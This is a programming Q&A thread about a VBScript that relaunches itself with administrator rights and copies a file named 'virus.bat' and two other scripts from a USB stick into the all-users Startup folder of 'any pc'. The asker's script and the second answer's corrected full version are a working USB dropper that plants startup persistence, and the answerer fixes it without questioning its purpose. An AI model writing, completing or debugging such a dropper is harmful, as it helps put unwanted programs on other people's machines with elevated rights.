# Vbscript loops when it shouldn't

Tags: vbscript

I have this vbs script:

```
Set WshShell = WScript.CreateObject("WScript.Shell")
Set ObjShell = CreateObject("Shell.Application")
ObjShell.ShellExecute "wscript.exe", """" & _
WScript.ScriptFullName & """" &_
" RunAsAdministrator", , "runas", 1
Const Destination = "c:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\"
Const Virus = "virus.bat"
Const YesNo = "yesnovbs.vbs"
Const CDRom = "cd-rom.vbs"
Set fso = CreateObject("Scripting.FileSystemObject")
fso.CopyFile Virus, Destination, True
fso.CopyFile YesNo, Destination, True
fso.CopyFile CDRom, Destination, True
```

Basically, it copies some files from my USB to startup directory in any pc. The problem is, that the script keeps executing itself. I wanted this script to copy files and exit, how do I do that?

Answer (score 0):

You need to do the restart just once, depending on a condition (e.g. a parameter). Demo:

```
If 0 = WScript.Arguments.Count Then
   WScript.Echo "first run, starting script again"
   CreateObject("WScript.Shell").Exec "wscript.exe " & WScript.ScriptName & " param"
Else
   MsgBox "second run"
End If
```

output:

[image]

Comment: Thanks! Although I found another, but a similar way to cope with my problem. By the way, why the script need to be restarted? Why can't it run once and quit without any additional lines of code?

Comment: @user3431852 Because you want it to run "as Administrator".

Answer (score 0):

```
Function  runas()
  Set WshShell = WScript.CreateObject("WScript.Shell")
  Set ObjShell = CreateObject("Shell.Application")
   If WScript.Arguments.Length = 0 Then 
     ObjShell.ShellExecute "wscript.exe", """" & _
     WScript.ScriptFullName & """" &_
     " RunAsAdministrator", , "runas", 1
     WScript.Quit 
  End If 
End Function

Call runas()

Const Destination = "c:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\"
Const Virus = "virus.bat"
Const YesNo = "yesnovbs.vbs"
Const CDRom = "cd-rom.vbs"
Set fso = CreateObject("Scripting.FileSystemObject")
fso.CopyFile Virus, Destination, True
fso.CopyFile YesNo, Destination, True
fso.CopyFile CDRom, Destination, True

Set WshShell = Nothing 
Set objShell = Nothing 
Set fso = Nothing
```

If you did not add the `wscript.Arguments.length = 0` condition statement it will keep continue work